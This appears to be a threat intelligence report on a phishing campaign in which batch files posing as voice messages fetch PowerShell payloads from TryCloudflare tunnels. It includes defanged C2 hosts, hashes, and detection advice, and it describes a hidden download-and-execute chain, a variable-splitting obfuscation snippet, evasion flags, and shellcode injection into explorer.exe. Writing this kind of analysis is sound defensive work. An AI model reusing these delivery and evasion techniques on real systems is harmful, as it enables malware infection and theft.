highPhishing
Operation VOICETRAP — FUD Batch File Campaign Targeting Israel via TryCloudflare Tunnels
InvestigatedApril 3, 2026PublishedApril 3, 2026
Threat Actors:ProfileAssessmentartifacts recoveredusing the same TryCloudflare playbooks-abuse-cloudflare-tunnels-threat-research/)
voicemessagebatisraelc2ratcloudflaretrycloudflaretorbatch-file
TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Commodity Malware Delivery Status: ACTIVE — Infrastructure live, 0/61 AV detection
Executive Summary
A fully undetectable (FUD) malware campaign is actively targeting victims in Israel using batch files disguised as voice messages ("voicemessage.bat"). The campaign uses an automated polymorphic builder that produces unique samples with randomized variable names, temp file paths, and junk padding while maintaining identical core functionality. Each sample embeds a legitimate M4A audio file as a decoy (played to the victim to sell the "voice message" cover story) while silently downloading and executing a PowerShell payload from Cloudflare's free TryCloudflare tunnel service. As of April 3, 2026, all three voicemessage.bat variants achieve 0/61 AV detection on VirusTotal, confirming the FUD claim.
A related but structurally distinct sample ("final.bat") from the same 24-hour window uses the same TryCloudflare delivery mechanism but employs a more sophisticated Python-based shellcode loader consistent with the SERPENTINE#CLOUD / VOID#GEIST campaign families documented by Securonix.
Key Findings
- 0/61 AV detection across all three voicemessage.bat variants — truly FUD
- Polymorphic builder producing unique hashes with identical payloads (same M4A decoy audio across all samples)
- Two distinct TryCloudflare tunnels used for C2:
old-entire-sequences-reactionsandroger-conditioning-thriller-forms - Social engineering: Embedded M4A decoy audio opens in media player to convince victim the file is a real voice message
- Multi-stage attack: BAT -> VBScript (base64 decode M4A) -> VBScript (launch PowerShell) -> PS1 payload from TryCloudflare
- Tunnels still live as of April 3, 2026 (returning 403, likely filtering by User-Agent/headers)
- Related SERPENTINE#CLOUD variant (final.bat) uses Python encrypted shellcode loader injecting into explorer.exe
- roger-conditioning tunnel active since at least March 26, 2026 (per URLScan.io submission)
Campaign Scale (Expanded via VirusTotal Pivoting)
The initial 3 samples from MalwareBazaar were the tip of the iceberg. VirusTotal domain relationship pivoting on the roger-conditioning tunnel revealed at least 8 unique voicemessage.bat variants and 5 delivery archive ZIPs across a 7-day campaign window.
Full Campaign Timeline
| Timestamp (UTC) | File | SHA256 (truncated) | Size | Source |
|---|---|---|---|---|
| 2026-03-27 05:54 | voicemessage.bat | 5e306f54... | 50,518 | VT (roger-conditioning relation) |
| 2026-03-30 21:56 | voicemessage.bat | 294468f3... | 50,034 | VT (roger-conditioning relation) |
| 2026-03-30 22:45 | archive_voicemessage_295.zip | 70b122b2... | 50,498 | VT (roger-conditioning relation) |
| 2026-03-31 00:51 | archive_voicemessage_839.zip | b873de2b... | 50,080 | VT (roger-conditioning relation) |
| 2026-03-31 00:52 | voicemessage.bat | f1a0ad10... | 49,950 | VT (roger-conditioning relation) |
| 2026-03-31 01:24 | archive_voicemessage_768.zip | 23987773... | 48,821 | VT (roger-conditioning relation) |
| 2026-03-31 18:51 | archive0331.zip | c6316381... | 49,314 | VT (roger-conditioning relation) |
| 2026-03-31 19:36 | archive0331.zip | 2f1930f2... | 48,537 | VT (roger-conditioning relation) |
| 2026-04-02 11:26 | voicemessage.bat | 3877ef81... | 49,483 | MalwareBazaar (smica83) |
| 2026-04-02 12:48 | voicemessage.bat | 9a5af44a... | 49,184 | MalwareBazaar (smica83) |
| 2026-04-02 12:49 | voicemessage.bat | 2bedd77c... | 48,407 | MalwareBazaar (smica83) |
| 2026-04-02 13:37 | final.bat (Builder B) | ea4043b0... | 7,512 | MalwareBazaar (pr0xylife) |
Delivery Packaging Patterns
- — Random 3-digit suffix, contains single voicemessage.bat
- — Date-stamped (March 31), contains single voicemessage.bat
- All ZIPs tagged by VT sandbox: , (anti-analysis indicators)
Campaign Operational Tempo
- Day 1 (Mar 27): Single sample — possible test/initial deployment
- Day 4-5 (Mar 30-31): Burst of 7 samples/archives — full operational deployment
- Day 7 (Apr 2): 3 new variants + C2 tunnel rotation (old-entire added alongside roger-conditioning) — campaign evolution
Attack Chain
[Email/Messaging Delivery]
|
voicemessage.bat
|
+----+----+
| |
VBScript VBScript
(decode) (download)
| |
M4A decoy PowerShell -WindowStyle Hidden
(opens in (Invoke-WebRequest | IEX)
media |
player) TryCloudflare tunnel
/fp.ps1 or /out
|
[STAGE 2 PAYLOAD]
(PS1 not yet recovered -
tunnels return 403)
Infrastructure Analysis
TryCloudflare Tunnels (C2 Delivery)
| Tunnel Subdomain | Path | Resolves To | Status | First Seen |
|---|---|---|---|---|
| old-entire-sequences-reactions[.]trycloudflare[.]com | /out | 104.16.230[.]132, 104.16.231[.]132 | LIVE (403) | 2026-04-02 |
| roger-conditioning-thriller-forms[.]trycloudflare[.]com | /fp.ps1 | 104.16.230[.]132, 104.16.231[.]132 | LIVE (403) | 2026-03-26 |
| requires-fortune-nutten-eligible[.]trycloudflare[.]com | /files.zip, /add_to_startup.bat | 104.16.230[.]132, 104.16.231[.]132 | LIVE (status unknown) | 2026-04-02 |
Note: All tunnels resolve to Cloudflare anycast IPs (AS13335). The actual origin server is hidden behind Cloudflare's infrastructure. TryCloudflare tunnels are ephemeral — the actor runs cloudflared tunnel on their machine and gets a random subdomain. No registration, no payment, no attribution trail through Cloudflare.
VirusTotal Domain Reputation
| Domain | Malicious | Suspicious | Harmless | Undetected |
|---|---|---|---|---|
| old-entire-sequences-reactions[.]trycloudflare[.]com | 1 (CRDF) | 3 | 60 | 30 |
| roger-conditioning-thriller-forms[.]trycloudflare[.]com | 0 | 0 | 62 | 32 |
Malware Analysis
Builder A — "voicemessage.bat" (Polymorphic FUD Builder)
Sample Inventory
| SHA256 | Size | C2 Tunnel | Reporter | First Seen | VT Detection |
|---|---|---|---|---|---|
| 2bedd77cc5402b2a151ae4f4d9743dbdd12d6368ac16dcf86678bd185315957e | 48,407 | roger-conditioning | smica83 | 2026-04-02 12:49 | 0/60 |
| 9a5af44af5dcf614cecb9d6a14f1412e6e59355b980dd1c28325aa3c31de24a1 | 49,184 | roger-conditioning | smica83 | 2026-04-02 12:48 | 0/60 |
| 3877ef81288520aca410885207b0647c79955655adb023a0c50df0255a8e8b00 | 49,483 | old-entire-sequences | smica83 | 2026-04-02 11:26 | 0/61 |
Polymorphic Characteristics
The builder randomizes the following per-sample while keeping the functional payload identical:
- Temp file names: Random alphanumeric strings (e.g.,
SekEecP837,KOZrGsfmoZa943,iOqkBWPbyGL567) - Variable name suffixes: Random suffixes on
lnk_N_SUFFIXanddlcmd_N_SUFFIXvariables - Junk padding: REM and :: comment lines with random strings inserted between functional lines (82-96 junk lines per sample)
- Line count: Varies (622-632 lines) due to random junk insertion
- File size: Varies (48-49 KB) accordingly
The embedded M4A decoy audio is byte-for-byte identical across all three samples (MD5: 5f630161ae03098ac692ebbefa14d539, SHA256: d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce, 21,636 bytes).
Execution Flow (Confirmed by CAPE Sandbox)
@echo off+setlocal ENABLEDELAYEDEXPANSION+chcp 65001(UTF-8 codepage)- Display message: "Preparing to decode audiomessage"
- Reconstruct TryCloudflare URL from ~15 split variables (
lnk_0throughlnk_14) - Reconstruct full PowerShell download command from ~52 split variables (
dlcmd_0throughdlcmd_51) - Write base64-encoded M4A audio to
%TEMP%\[random].b64(401 echo lines) - Generate VBScript #1: Decode base64 to M4A file using MSXML2.DOMDocument + ADODB.Stream
- Execute VBScript #1 via
cscript //nologo - Generate VBScript #2: Execute reconstructed PowerShell command via
WScript.Shell.Runwith visibility=0 (hidden) - Execute VBScript #2 via
cscript //nologo - Open decoded M4A file via
start ""(launches default media player — Zune/Groove Music)
The victim sees a media player open and hears audio, believing the "voice message" is real. Meanwhile, PowerShell silently downloads and executes the Stage 2 payload from the TryCloudflare tunnel.
Obfuscation Technique — Variable Splitting
The C2 URL and PowerShell command are split across dozens of individually-set environment variables, then reassembled using delayed expansion (!var!). Example reconstruction:
set "lnk_0=https"
set "lnk_1=://ol"
set "lnk_2=d-"
...
set "ps1_url=!lnk_0!!lnk_1!!lnk_2!..."
This defeats static string matching (no complete URL or PowerShell keyword appears in the file) while remaining trivially reversible.
Builder B — "final.bat" (SERPENTINE#CLOUD Variant)
| SHA256 | Size | Reporter | First Seen | Signature |
|---|---|---|---|---|
| ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd | 7,512 | pr0xylife | 2026-04-02 13:37 | None |
This is a structurally different and more advanced builder:
- Downloads Python 3.11.8 embedded distribution
- Installs pip, psutil, cryptography, pyaes
- Downloads
files.zip(containingencrypted_loader.py,as_encrypted.bin,as_key.bin) - Downloads
add_to_startup.batfor persistence - Runs:
python encrypted_loader.py -f as_encrypted.bin explorer.exe - Key file:
as_key.bin(expected 48 bytes = 32-byte AES key + 16-byte IV) - Injection target:
explorer.exe(process injection) - Install path:
%APPDATA%\Microsoft\Windows\Crypto\RSA\Cache(blends with legitimate Windows crypto cache)
This matches the SERPENTINE#CLOUD / VOID#GEIST campaign family documented by Securonix (2025-2026).
Decoy Audio Analysis
| Property | Value |
|---|---|
| File Type | M4A (MPEG-4 Audio, ftyp brand: M4A) |
| Size | 21,636 bytes (~21 KB) |
| SHA256 | d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce |
| MD5 | 5f630161ae03098ac692ebbefa14d539 |
| Duration | ~2-3 seconds (estimated from file size) |
The small size suggests a very short audio clip — possibly a brief "hello" or generic greeting, enough to seem legitimate for a voice message notification.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Application |
|---|---|---|---|
| Initial Access | Phishing: Spearphishing Link | T1566.002 | Voicemessage.bat delivered via link |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | BAT file execution |
| Execution | Command and Scripting Interpreter: Visual Basic | T1059.005 | VBScript for base64 decode + PS launch |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell IEX from C2 |
| Defense Evasion | Obfuscated Files or Information | T1027 | Variable splitting, junk padding |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | Base64-encoded M4A decoy |
| Defense Evasion | Masquerading | T1036 | voicemessage.bat poses as audio file |
| Defense Evasion | Hide Artifacts: Hidden Window | T1564.003 | PowerShell -WindowStyle Hidden |
| Command and Control | Ingress Tool Transfer | T1105 | PS1 download from TryCloudflare |
| Command and Control | Proxy: External Proxy | T1090.002 | TryCloudflare as C2 proxy |
| Resource Development | Acquire Infrastructure: Web Services | T1583.006 | Free TryCloudflare tunnel service |
Threat Actor Profile
Attribution Assessment
- Confidence: LOW
- Evidence: Limited — samples submitted by smica83 with "from Israel" context, but no direct actor artifacts recovered
- Motivation: Unknown — Stage 2 payload not recovered (tunnels return 403)
- Builder sophistication: MEDIUM — polymorphic randomization is automated but obfuscation technique (variable splitting) is elementary
- Campaign maturity: The roger-conditioning tunnel has been active since at least March 26 (8+ days), suggesting operational patience
Possible Campaign Links
- SERPENTINE#CLOUD: The final.bat sample (Builder B) is consistent with SERPENTINE#CLOUD TTPs documented by Securonix — Python-based encrypted shellcode loader, TryCloudflare delivery, AES-encrypted payloads
- VOID#GEIST: Securonix's March 2026 follow-up campaign documenting multi-stage Python loaders delivering XWorm, AsyncRAT, and XenoRAT
- The voicemessage.bat (Builder A) may be a NEW builder variant from the same operators or an independent actor using the same TryCloudflare playbook
IOC Summary
Network Indicators
old-entire-sequences-reactions[.]trycloudflare[.]comroger-conditioning-thriller-forms[.]trycloudflare[.]comrequires-fortune-nutten-eligible[.]trycloudflare[.]com104.16.230[.]132(Cloudflare anycast — shared infrastructure, not specific to actor)104.16.231[.]132(Cloudflare anycast — shared infrastructure, not specific to actor)
File Indicators
| Hash Type | Value | File |
|---|---|---|
| SHA256 | 2bedd77cc5402b2a151ae4f4d9743dbdd12d6368ac16dcf86678bd185315957e | voicemessage.bat (sample 1) |
| SHA256 | 9a5af44af5dcf614cecb9d6a14f1412e6e59355b980dd1c28325aa3c31de24a1 | voicemessage.bat (sample 2) |
| SHA256 | 3877ef81288520aca410885207b0647c79955655adb023a0c50df0255a8e8b00 | voicemessage.bat (sample 3) |
| SHA256 | ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd | final.bat (SERPENTINE#CLOUD variant) |
| SHA256 | d11d8bc2f78520fb6b7bb7d3173597787654a56faa51768246fdd76143046fce | Embedded M4A decoy audio |
| MD5 | a9bd78eea829facf9068c600560a686c | voicemessage.bat (sample 1) |
| MD5 | ab7e6e76ea30a31a67f6f143b954cd78 | voicemessage.bat (sample 2) |
| MD5 | 2e59f7cbe7ad23fbae276cda57b3ad90 | voicemessage.bat (sample 3) |
| MD5 | 8f3a7333507cdb65756661088a50cae0 | final.bat |
| TLSH | T10E23A6F3A09E04D509EB47700E2AB509FF54867BD10CD827684699B79B3D3D97A0F0EA | voicemessage.bat (sample 1) |
| TLSH | T12E23F9FB609DAA05C9A74B6C0F18C985FF64C07B81805A174647267503BE3F57A8FBCA | voicemessage.bat (sample 2) |
| TLSH | T1B823C7F3639E06158C2B4A6C1E9D8127FF44C06BC11A681774BE147B4A3E2D5EABF1C9 | voicemessage.bat (sample 3) |
| ssdeep | 768:t7Ek1Uy3ImODcmyar4bLwH3m7nRpq5CD91B6B/c6H:tVOZyaEUWvaCD91ScW | voicemessage.bat (sample 1) |
Behavioral Indicators
- Temp files:
%TEMP%\[random].b64,%TEMP%\[random].vbs,%TEMP%\[random].m4a - Console message: "Preparing to decode audiomessage"
- Variable pattern:
set "lnk_N_[random]=..."andset "dlcmd_N_[random]=..." - PowerShell flags:
-WindowStyle Hidden -Nologo -ExecutionPolicy Bypass - VBScript using MSXML2.DOMDocument for base64 decode
- ADODB.Stream for binary file write
- Install path (Builder B):
%APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\ - Persistence script (Builder B):
add_to_startup.bat - Payload files (Builder B):
encrypted_loader.py,as_encrypted.bin,as_key.bin
Recommended Actions
Immediate (24-48 hours)
- Block TryCloudflare tunnel subdomains at proxy/DNS level (or block
trycloudflare.comentirely if not in business use) - Deploy YARA rules (below) to detect voicemessage.bat builder variants
- Monitor for
.batfiles containing "Preparing to decode audiomessage" or thelnk_N_/dlcmd_N_variable pattern - Submit tunnel URLs to Cloudflare abuse reporting
Short-term (1-2 weeks)
- Hunt for additional Builder A variants using ssdeep/TLSH fuzzy matching on MalwareBazaar
- Monitor for new TryCloudflare subdomains in CT logs delivering similar payloads
- Investigate whether Stage 2 PS1 payload can be recovered via sandbox re-submission with different network conditions
Medium-term (1-3 months)
- Develop detection for the VBScript->PowerShell->IEX chain via endpoint telemetry
- Correlate with SERPENTINE#CLOUD / VOID#GEIST infrastructure for campaign overlap
References
- Securonix: Analyzing SERPENTINE#CLOUD
- Securonix: VOID#GEIST Multi-Stage Python Loader
- Proofpoint: Threat Actor Abuses Cloudflare Tunnels to Deliver RATs
- The Hacker News: AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels
- MalwareBazaar: voicemessage.bat submissions by smica83
- URLScan.io: roger-conditioning-thriller-forms scan
GHOST — Breakglass Intelligence "One indicator. Total infrastructure."